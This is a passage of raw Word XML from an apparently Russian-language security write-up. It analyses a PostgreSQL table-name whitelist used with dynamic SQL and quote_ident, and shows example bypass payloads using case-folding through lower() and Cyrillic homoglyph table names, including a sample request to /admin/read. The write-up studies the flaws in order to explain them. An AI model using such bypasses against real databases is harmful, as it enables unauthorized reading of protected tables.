        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF tbl_name &lt;&gt; ALL(allowed) THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032993B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        RAISE EXCEPTION 'table not in whitelist: %', tbl_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D144ADC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E88DE66" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C8BF01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- quote_ident вызван — кажется безопасно</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67545BEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN QUERY EXECUTE format('SELECT * FROM %s', quote_ident(tbl_name));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A57C01C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0371B550" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4567F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tbl_name &lt;&gt; ALL(allowed)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — точное сравнение bytes. Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tbl_name = 'public_users'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, проверка пройдёт; если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'PUBLIC_USERS'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — не пройдёт. Кажется надёжно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB19D5C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Application-caller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EEA239" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/admin/read")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD22958" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def read_table(tbl: str, session: AsyncSession = Depends(get_session)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B88D721" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB1F5BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        text("SELECT * FROM app.read_table(:t) AS t(id int, data text)"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D2AF3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {"t": tbl},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D59D92" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0AB617"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2BF87835" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — case-fold bypass + Unicode homoglyph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762859CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант A — Case-folding atypical setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509F16E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сценарий: разработчик добавил </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>внутренний admin-table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с double-quoted именем для отличия от public-таблиц:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697FC86C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE "AdminSecrets" (id int, secret text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6638D1AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT INTO "AdminSecrets" VALUES (1, 'top-secret-config');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD05F52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>отдельная таблица</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>adminsecrets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (которой нет). Whitelist не включает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"AdminSecrets"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — потому что разработчик «забыл», что эта таблица существует. Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E58A3B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /admin/read?tbl=AdminSecrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F4D12E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Whitelist-проверка: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'AdminSecrets' &lt;&gt; ALL(ARRAY['public_users', 'public_articles', 'public_comments'])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (не в whitelist). RAISE EXCEPTION — атака не сработала. Хорошо.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0979BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Но если разработчик </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сделал case-insensitive whitelist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через явный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower()</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F87E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IF lower(tbl_name) &lt;&gt; ALL(ARRAY['public_users', ...]) THEN  -- БУГ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5D4649" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RAISE EXCEPTION ...;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5E6683" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FA381" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('SELECT * FROM %s', quote_ident(tbl_name));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548065A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tbl_name = 'PUBLIC_USERS'</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC79C31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower('PUBLIC_USERS') = 'public_users'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → проходит whitelist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BFE14F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident('PUBLIC_USERS')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"PUBLIC_USERS"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (capital, с quotes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3387EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM "PUBLIC_USERS"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → ERROR: relation does not exist (если такой таблицы нет).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF1EB5C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Но если в схеме существует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>другая таблица</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с capital name (типичная mistake — миграция из MS SQL Server, где case-sensitive имена не редкость, или legacy schema):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDEE99B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE "PUBLIC_USERS" (id int, sensitive_data text);  -- мигрировал из другого DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B4E08F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Атакующий читает её через payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'PUBLIC_USERS'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Whitelist проверил </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, который скрыл, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'PUBLIC_USERS'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≠ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'public_users'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E17B487" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант B — Unicode homoglyph через quote_ident-passthrough:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E756C24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL разрешает Unicode characters в identifier (при default-encoding UTF-8). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не нормализует Unicode — Cyrillic 's' (U+0455) валиден как identifier-char. Сценарий:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C29DC1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- В схеме случайно создалась таблица с Cyrillic в имени (mis-paste из документа)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2AFEE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE "uѕers" (id int, password text);  -- Cyrillic 'ѕ' U+0455</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E81E59F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tbl_name = 'uѕers'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Cyrillic 's'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7852C858" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Whitelist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'uѕers' &lt;&gt; ALL(ARRAY['users', ...])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (bytes different) → RAISE EXCEPTION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADCD208" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Но если whitelist через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сам whitelist содержит Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24722C56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>allowed text[] := ARRAY['users', 'articles'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1BB842" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
